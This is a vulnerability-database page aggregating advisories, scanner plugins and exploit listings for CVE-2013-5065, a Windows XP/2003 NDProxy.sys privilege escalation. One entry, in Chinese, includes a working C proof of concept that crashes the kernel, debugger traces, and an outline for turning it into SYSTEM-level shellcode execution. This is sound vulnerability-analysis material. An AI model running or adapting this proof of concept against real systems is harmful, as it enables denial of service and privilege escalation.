Vulnerabilities > CVE-2013-5065 - Unspecified vulnerability in Microsoft Windows 2003 Server and Windows XP
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 3 |
Exploit-Db
description Microsoft Windows ndproxy.sys - Local Privilege Escalation. CVE-2013-5065. Local exploit for windows platform id EDB-ID:30392 last seen 2016-02-03 modified 2013-12-17 published 2013-12-17 reporter metasploit source https://www.exploit-db.com/download/30392/ title Microsoft Windows ndproxy.sys - Local Privilege Escalation description Windows NDPROXY Local SYSTEM Privilege Escalation. CVE-2013-5065. Local exploit for windows platform id EDB-ID:30014 last seen 2016-02-03 modified 2013-12-03 published 2013-12-03 reporter ryujin source https://www.exploit-db.com/download/30014/ title Windows NDPROXY - Local SYSTEM Privilege Escalation MS14-002 description Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002). CVE-2013-5065. Local exploit for win32 platform file exploits/windows_x86/local/37732.c id EDB-ID:37732 last seen 2016-02-04 modified 2015-08-07 platform windows_x86 port published 2015-08-07 reporter Tomislav Paskalev source https://www.exploit-db.com/download/37732/ title Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 MS14-002 type local
Metasploit
| description | This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. |
| id | MSF:EXPLOIT/WINDOWS/LOCAL/MS_NDPROXY |
| last seen | 2020-05-24 |
| modified | 2018-03-29 |
| published | 2013-12-11 |
| references |
|
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms_ndproxy.rb |
| title | MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation |
Msbulletin
| bulletin_id | MS14-002 |
| bulletin_url | |
| date | 2014-01-14T00:00:00 |
| impact | Elevation of Privilege |
| knowledgebase_id | 2914368 |
| knowledgebase_url | |
| severity | Important |
| title | Vulnerability in Windows Kernel Could Allow Elevation of Privilege |
Nessus
NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS14-002.NASL description The Windows kernel on the remote host is affected by a privilege escalation vulnerability. Specifically, the vulnerability exists in the version of NDProxy.sys. If successfully exploited, a locally authenticated attacker could run a specially crafted application in kernel mode to take control of the system. last seen 2020-06-01 modified 2020-06-02 plugin id 71942 published 2014-01-14 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/71942 title MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) NASL family Windows NASL id SMB_KB2914486.NASL description The remote host has an unspecified privilege elevation vulnerability in NDProxy.sys, a system-provided communications driver. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code in kernel mode. Additionally, the attacker could view, change or even delete data, as well as install programs and/or create new accounts with full administrative rights. last seen 2017-10-29 modified 2014-01-19 plugin id 71140 published 2013-11-29 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=71140 title KB2914486: Vulnerability in Microsoft Windows Kernel Could Allow Elevation of Privilege
Packetstorm
data source https://packetstormsecurity.com/files/download/124294/windowsndproxy-escalate.txt id PACKETSTORM:124294 last seen 2016-12-05 published 2013-12-05 reporter ryujin source https://packetstormsecurity.com/files/124294/Microsoft-Windows-NDPROXY-Local-SYSTEM-Privilege-Escalation.html title Microsoft Windows NDPROXY Local SYSTEM Privilege Escalation data source https://packetstormsecurity.com/files/download/124466/ms_ndproxy.rb.txt id PACKETSTORM:124466 last seen 2016-12-05 published 2013-12-17 reporter juan vazquez source https://packetstormsecurity.com/files/124466/Microsoft-Windows-ndproxy.sys-Local-Privilege-Escalation.html title Microsoft Windows ndproxy.sys Local Privilege Escalation data source https://packetstormsecurity.com/files/download/132986/windowsndproxyms14002-escalate.txt id PACKETSTORM:132986 last seen 2016-12-05 published 2015-08-07 reporter Tomislav Paskalev source https://packetstormsecurity.com/files/132986/MS14-002-Windows-NDProxy-Privilege-Escalation.html title MS14-002 Windows NDProxy Privilege Escalation
Seebug
bulletinFamily exploit description No description provided by source. id SSV:83789 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-83789 title Microsoft Windows ndproxy.sys - Local Privilege Escalation bulletinFamily exploit description # 漏洞成因 这是一个windows内核漏洞,漏洞的触发需要开启Routing and Remote Access服务,影响 windowsxp,windows2003. 先上 poc ```c #include <windows.h> #include <stdio.h> int main() { HANDLE hDev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if(hDev==INVALID_HANDLE_VALUE) { printf("CreateFile Error:%d\n",GetLastError()); } DWORD InBuf[0x15] = {0}; DWORD dwRetBytes = 0; *(InBuf+5) = 0x7030125; *(InBuf+7) = 0x34; DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0); CloseHandle(hDev); return 0; } ``` **注意**:这个POC是运行的结果是蓝屏,请在虚拟机下运行! 在XP下编译好POC代码,然后运行编译出来的EXE,双机调试,断在windbg,提示 ``` Access violation - code c0000005 (!!! second chance !!!) 00000038 jQuery21405265350940171629_1451585769819 ??? ``` 当前EIP执行到了0x38这个内核地址。 栈回溯,看看出错前都调了什么函数 ``` kd> kb ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. b235dc14 f87bd145 822e6dc8 82117ef8 8227b410 0x38 b235dc34 804ef189 8227b2b8 000001b0 806d42d0 NDProxy!PxIODispatch+0x2b3 ``` 提示现在的栈有可能已经不正确了,看到前一个正常调用的函数是`NDProxy!PxIODispatch+0x2b3` 用IDA加载ndproxy.sys模块(Xp下的路径为 C:\WINDOWS\system32\drivers\ndproxy.sys),去这个函数看看  这是一个函数地址表,起始地址00018188,  结束地址0001832C  那么这个表的大小就是0x1a4 重启虚拟机,在call off_18188[eax]处下断,查看此时eax的值 ``` kd> r eax eax=000001b0 ``` 那么是call到18188+1b0 = 18338h,已经超过了表的大小,根据图3,可以看到这个地址是0x38,会出现第一步的crash到0x38。所以说这里的问题是数组指针越界了。 --- # 进一步分析eax怎么来的 先看这个API ``` BOOL WINAPI DeviceIoControl( __in HANDLE hDevice, //设备句柄 __in DWORD dwIoControlCode, //设备操作控制码 __in_bcount_opt(nInBufferSize) LPVOID lpInBuffer, //设备请求数据的buffer,inbuffer __in DWORD nInBufferSize, //inbuffer大小 __out_bcount_part_opt(nOutBufferSize, *lpBytesReturned) LPVOID lpOutBuffer, //OutBuffer __in DWORD nOutBufferSize, //OutBuffer大小 __out_opt LPDWORD lpBytesReturned, //实际返回到OutBuffer __inout_opt LPOVERLAPPED lpOverlapped ); ``` IDA里看到PxIODispatch函数先会比较IO控制码(DeviceIoControl函数中的参数2)  单步来到  动态调试查看此时edi被赋值后的值 ``` NDProxy!PxIODispatch+0x1ea: f87bd07c 8b7d0c mov edi,dword ptr [ebp+0Ch] kd> r edi edi=00000054 ``` 是inbufferSize(DeviceIoControl函数中的参数4),和edx=0x24比较 单步来到  查看ecx的值 ``` kd> r ecx ecx=00000024 ``` 是outbufferSize(DeviceIoControl函数中的参数6),和edx=0x24比较 单步到 ``` f87bd092 8b4614 mov eax,dword ptr [esi+14h] f87bd095 2d01010307 sub eax,7030101h f87bd09a 3bc2 cmp eax,edx f87bd09c 8955fc mov dword ptr [ebp-4],edx f87bd09f 760c jbe NDProxy!PxIODispatch+0x21b (f87bd0ad) ``` 这里是漏洞形成的关键,查看此时esi指向的内存 ``` kd> dd esi 82046c28 00000000 00000000 00000000 00000000 82046c38 00000000 07030125 00000000 00000034 82046c48 00000000 00000000 00000000 00000000 ``` 看到07030125这个值是DeviceIoControl函数中的参数2,正好是esi+14h。把这个值给了eax,,做减法跳走  然后eax=eax*3;eax=eax*4;相当于 eax = eax *12,并且暂存。 接下来  在蓝色箭头的部分,恢复eax的值,直接作为函数表的索引,进行调用。 那么我们按上面的流程计算: ```python >>> hex((0x07030125 - 0x7030101)*12) '0x1b0' ``` 刚好是crash时,eax的值。 漏洞形成的原因就是把程序的输入buffer中的数,计算后的值当作函数指针操作,产生了bug。 --- # 进一步利用 因为是在xp下是有办法在ring3写kernel的地址的,所以这个poc可以进一步修改,做利用。 利用的思路是在地址0x38处写一句,push shellcode地址,然后ret,就能到执行到shellcode了。代码有点长,就不贴了,打包了代码和编译好的exp在压缩包里(请在虚拟机 xp下使用,可以提权到system权限获得shell)。 id SSV:83482 last seen 2017-11-19 modified 2014-07-01 published 2014-07-01 reporter Root source https://www.seebug.org/vuldb/ssvid-83482 title Windows NDPROXY - 本地权限提升漏洞(MS14-002)
The Hacker News
id THN:1EA4AB16D6C3A0518A078CC8C9304FA5 last seen 2017-01-08 modified 2013-11-29 published 2013-11-29 reporter Mohit Kumar source http://thehackernews.com/2013/11/CVE-2013-5065-Windows-XP-Privilege-escalation-Zero-Day-exploit.html title CVE-2013-5065: Microsoft Windows XP and Server 2003 Privilege escalation Zero-Day exploit discovered id THN:2BA81AD2F8F7B8FE383C85260BD9F089 last seen 2018-01-27 modified 2013-12-10 published 2013-12-10 reporter Wang Wei source https://thehackernews.com/2013/12/microsoft-released-security-patch-for.html title Microsoft released Security Patch for CVE-2013-5065 TIFF Zero-Day vulnerability
References
- http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html
- http://technet.microsoft.com/security/advisory/2914486
- https://www.exploit-db.com/exploits/37732/
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-002